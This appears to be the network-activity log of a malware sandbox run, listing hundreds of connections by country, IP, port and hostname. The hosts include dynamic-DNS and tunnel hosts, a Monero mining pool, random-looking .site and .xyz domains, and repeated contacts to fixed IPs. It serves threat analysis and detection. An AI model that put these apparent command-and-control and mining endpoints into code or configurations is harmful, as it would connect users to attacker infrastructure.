HK 134.122.129.19:80 134.122.129.19 tcp
US 8.8.8.8:53 19.129.122.134.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
IR 2.181.252.24:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 24.252.181.2.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 217.30.162.244:40500 udp
US 8.8.8.8:53 244.162.30.217.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.215.113.84:80 185.215.113.84 tcp
BG 195.230.23.72:80 tcp
UZ 92.38.19.10:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 10.19.38.92.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 83.239.55.170:40500 udp
US 8.8.8.8:53 170.55.239.83.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 178.132.2.10:4000 tcp
KZ 178.91.167.50:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
UZ 195.158.18.194:40500 udp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 194.18.158.195.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 154.216.17.90:80 tcp
KZ 37.99.54.230:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 230.54.99.37.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
SY 77.44.198.123:40500 udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 38.180.123.95:3232 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 123.198.44.77.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
UZ 89.236.218.158:40500 udp
US 8.8.8.8:53 158.218.236.89.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CN 150.158.37.254:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
NL 89.110.69.103:80 tcp
KZ 5.76.0.203:40500 udp
US 8.8.8.8:53 203.0.76.5.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 20.83.148.22:80 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
NL 89.110.69.103:80 tcp
RU 185.215.113.66:80 twizt.net tcp
KZ 31.171.185.170:40500 tcp
DE 185.218.125.157:21441 tcp
UZ 93.188.85.2:40500 udp
US 8.8.8.8:53 2.85.188.93.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 185.215.113.67:21405 tcp
CN 150.158.37.254:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.66:80 twizt.net tcp
KG 212.112.121.59:40500 udp
US 8.8.8.8:53 59.121.112.212.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
IR 46.167.149.255:40500 udp
US 8.8.8.8:53 255.149.167.46.in-addr.arpa udp
CN 183.57.21.131:8095 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
UZ 213.230.99.119:40500 udp
US 8.8.8.8:53 119.99.230.213.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:9222 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CN 183.57.21.131:8095 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
MX 189.167.22.36:40500 udp
KZ 178.88.234.149:40500 tcp
US 8.8.8.8:53 36.22.167.189.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
IR 2.181.218.27:40500 udp
KR 221.143.49.222:80 221.143.49.222 tcp
US 8.8.8.8:53 27.218.181.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 38.180.123.95:3232 tcp
US 20.83.148.22:80 tcp
KR 221.143.49.222:80 221.143.49.222 tcp
SY 178.253.109.195:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 195.109.253.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
UZ 87.237.236.86:40500 udp
US 8.8.8.8:53 86.236.237.87.in-addr.arpa udp
KZ 89.218.238.106:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 106.238.218.89.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
BG 195.230.23.72:80 tcp
GB 89.35.131.209:80 sanboxland.pro tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
KG 212.112.107.11:40500 udp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
UA 93.175.220.40:40500 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 claywyaeropumps.com udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
FR 163.172.171.111:10343 xmr-eu2.nanopool.org tcp
DE 185.218.125.157:21441 tcp
AO 102.219.187.80:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 111.171.172.163.in-addr.arpa udp
US 8.8.8.8:53 80.187.219.102.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
KZ 5.76.2.36:40500 udp
US 8.8.8.8:53 36.2.76.5.in-addr.arpa udp
BG 195.230.23.72:80 tcp
N/A 127.0.0.1:8777 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 84.53.244.106:40500 udp
US 8.8.8.8:53 106.244.53.84.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 78.36.17.105:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 105.17.36.78.in-addr.arpa udp
TH 154.197.69.165:443 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
TH 154.197.69.165:443 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
TH 154.197.69.165:443 tcp
KZ 31.169.15.229:40500 udp
TH 154.197.69.165:443 tcp
US 8.8.8.8:53 229.15.169.31.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
TJ 185.177.0.227:40500 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
BG 195.230.23.72:80 tcp
UZ 217.30.164.185:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 185.164.30.217.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
N/A 127.0.0.1:8777 tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
CN 101.200.220.118:8090 tcp
MX 187.235.150.54:40500 udp
US 8.8.8.8:53 54.150.235.187.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.162.48:40500 udp
US 8.8.8.8:53 48.162.156.90.in-addr.arpa udp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
CN 101.200.220.118:8090 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
TR 85.103.235.188:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 188.235.103.85.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
CN 101.200.220.118:8090 tcp
IR 185.123.69.47:40500 udp
US 8.8.8.8:53 47.69.123.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
KZ 178.91.91.13:40500 tcp
DE 185.218.125.157:21441 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
IR 176.67.79.229:40500 udp
US 8.8.8.8:53 229.79.67.176.in-addr.arpa udp
RU 185.215.113.67:21405 tcp
NL 38.180.123.95:3232 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:9222 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
YE 46.35.93.93:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 93.93.35.46.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 educational-reform.gl.at.ply.gg udp
BG 195.230.23.72:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 178.132.2.10:4000 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
KZ 46.36.149.47:40500 udp
US 8.8.8.8:53 47.149.36.46.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
IR 93.118.99.152:40500 udp
CN 101.35.228.105:20443 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 152.99.118.93.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
SY 95.212.73.0:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 0.73.212.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
TJ 185.177.0.227:40500 tcp
BG 195.230.23.72:80 tcp
NL 38.180.123.95:3232 tcp
US 20.83.148.22:80 tcp
CN 101.35.228.105:20443 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 camp.zapto.org udp
RO 37.120.247.6:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 6.247.120.37.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 92.124.152.236:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 236.152.124.92.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.215.113.209:80 185.215.113.209 tcp
RU 185.215.113.206:80 185.215.113.206 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 185.218.125.157:21441 tcp
KZ 92.47.143.122:40500 udp
US 8.8.8.8:53 122.143.47.92.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
KZ 178.89.189.131:40500 udp
US 8.8.8.8:53 131.189.89.178.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
BG 195.230.23.72:80 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 38.180.123.95:3232 tcp
RU 178.67.165.88:40500 udp
YE 46.161.239.195:40500 tcp
US 8.8.8.8:53 88.165.67.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
RU 78.81.147.173:40500 udp
US 8.8.8.8:53 173.147.81.78.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 reddemon.xyz udp
US 66.29.153.21:443 reddemon.xyz tcp
BG 195.230.23.72:80 tcp
UZ 194.93.26.59:40500 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 21.153.29.66.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
MX 189.133.187.71:40500 udp
US 8.8.8.8:53 71.187.133.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 66.29.153.21:443 reddemon.xyz tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 91.122.218.118:40500 udp
US 8.8.8.8:53 118.218.122.91.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
UZ 89.249.62.87:40500 udp
US 8.8.8.8:53 87.62.249.89.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
CN 110.40.138.5:4545 tcp
YE 178.130.103.42:40500 udp
US 8.8.8.8:53 42.103.130.178.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
MU 102.207.195.84:40500 udp
US 8.8.8.8:53 84.195.207.102.in-addr.arpa udp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
US 20.83.148.22:80 tcp
MX 189.173.142.192:40500 tcp
AO 154.118.201.198:40500 udp
CN 110.40.138.5:4545 tcp
US 8.8.8.8:53 198.201.118.154.in-addr.arpa udp
NL 89.110.69.103:80 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 8.8.8.8:53 claywyaeropumps.com udp
N/A 127.0.0.1:8777 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
UZ 213.230.71.228:40500 udp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 228.71.230.213.in-addr.arpa udp
BG 195.230.23.72:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 camp.zapto.org udp
YE 134.35.158.149:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 149.158.35.134.in-addr.arpa udp
UZ 90.156.194.146:40500 udp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 146.194.156.90.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 ip-api.com udp
DE 185.218.125.157:21441 tcp
KZ 37.151.27.190:40500 udp
US 208.95.112.1:80 ip-api.com tcp
KZ 37.151.202.166:40500 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 190.27.151.37.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
IR 195.181.23.242:40500 udp
N/A 127.0.0.1:9222 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 242.23.181.195.in-addr.arpa udp
IR 2.187.40.5:40500 udp
N/A 127.0.0.1:58963 tcp
NL 38.180.123.95:3232 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
GB 89.35.131.209:80 sanboxland.pro tcp
RU 94.51.68.160:40500 udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 160.68.51.94.in-addr.arpa udp
RU 185.215.113.209:80 185.215.113.209 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 217.30.162.161:40500 udp
US 8.8.8.8:53 161.162.30.217.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 193.161.193.99:25170 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
GB 89.35.131.209:80 sanboxland.pro tcp
BG 195.230.23.72:80 tcp
SG 216.107.138.162:40500 udp
US 8.8.8.8:53 162.138.107.216.in-addr.arpa udp
RU 185.215.113.209:80 185.215.113.209 tcp
DE 185.218.125.157:21441 tcp
IR 188.215.221.55:40500 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
IR 2.176.72.136:40500 udp
US 8.8.8.8:53 136.72.176.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
UZ 62.209.135.143:40500 udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 143.135.209.62.in-addr.arpa udp
NL 178.132.2.10:4000 tcp
CN 120.46.212.33:4433 tcp
DE 185.218.125.157:21441 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
VE 190.202.1.132:40500 udp
US 8.8.8.8:53 132.1.202.190.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CN 120.46.212.33:4433 tcp
BG 195.230.23.72:80 tcp
N/A 127.0.0.1:8777 tcp
RU 185.215.113.67:21405 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
IR 2.180.115.76:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 76.115.180.2.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 26.185.184.104:942 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
MX 201.108.200.21:40500 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
IR 46.248.34.105:40500 udp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 105.34.248.46.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CN 183.57.21.131:8095 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 193.161.193.99:25170 tcp
MX 201.114.202.249:40500 udp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 8.8.8.8:53 249.202.114.201.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
KZ 5.251.95.166:40500 udp
DE 193.161.193.99:25170 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 166.95.251.5.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
IR 2.181.206.190:40500 udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 20.83.148.22:80 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 190.206.181.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:58963 tcp
DE 185.218.125.157:21441 tcp
IR 151.232.164.243:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 243.164.232.151.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
KZ 37.151.202.166:40500 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
GB 20.26.156.215:443 github.com tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.167.42:40500 udp
HK 43.155.93.125:80 43.155.93.125 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 42.167.156.90.in-addr.arpa udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 125.93.155.43.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 38.180.123.95:3232 tcp
IR 2.181.170.246:40500 udp
US 8.8.8.8:53 246.170.181.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
BG 195.230.23.72:80 tcp
CN 183.57.21.131:8095 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
US 20.83.148.22:80 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 thighpecr.cyou udp
US 8.8.8.8:53 seallysl.site udp
US 8.8.8.8:53 opposezmny.site udp
KZ 37.99.54.230:40500 tcp
US 8.8.8.8:53 goalyfeastz.site udp
KZ 89.218.186.142:40500 udp
US 8.8.8.8:53 contemteny.site udp
US 8.8.8.8:53 dilemmadu.site udp
US 8.8.8.8:53 faulteyotk.site udp
US 8.8.8.8:53 authorisev.site udp
US 8.8.8.8:53 servicedny.site udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 92.122.63.136:443 steamcommunity.com tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 142.186.218.89.in-addr.arpa udp
US 8.8.8.8:53 136.63.122.92.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 193.161.193.99:25170 tcp
CN 183.57.21.131:8095 tcp
US 26.185.184.104:942 tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
IR 2.189.231.17:40500 udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 17.231.189.2.in-addr.arpa udp
US 8.8.8.8:53 67.213.58.216.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
SY 5.134.251.133:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 133.251.134.5.in-addr.arpa udp
US 8.8.8.8:53 claywyaeropumps.com udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
IR 2.187.89.214:40500 udp
RU 31.41.244.9:80 31.41.244.9 tcp
US 208.95.112.1:80 ip-api.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 214.89.187.2.in-addr.arpa udp
FR 172.217.20.206:443 clients2.google.com tcp
FR 172.217.20.206:443 clients2.google.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
RU 185.215.113.67:21405 tcp
AO 129.122.141.24:40500 udp
US 8.8.8.8:53 24.141.122.129.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 193.161.193.99:25170 tcp
SY 82.137.239.235:40500 udp
DE 185.218.125.157:21441 tcp
UZ 93.188.85.2:40500 tcp
N/A 127.0.0.1:8777 tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 235.239.137.82.in-addr.arpa udp
DE 41.216.183.9:8080 tcp
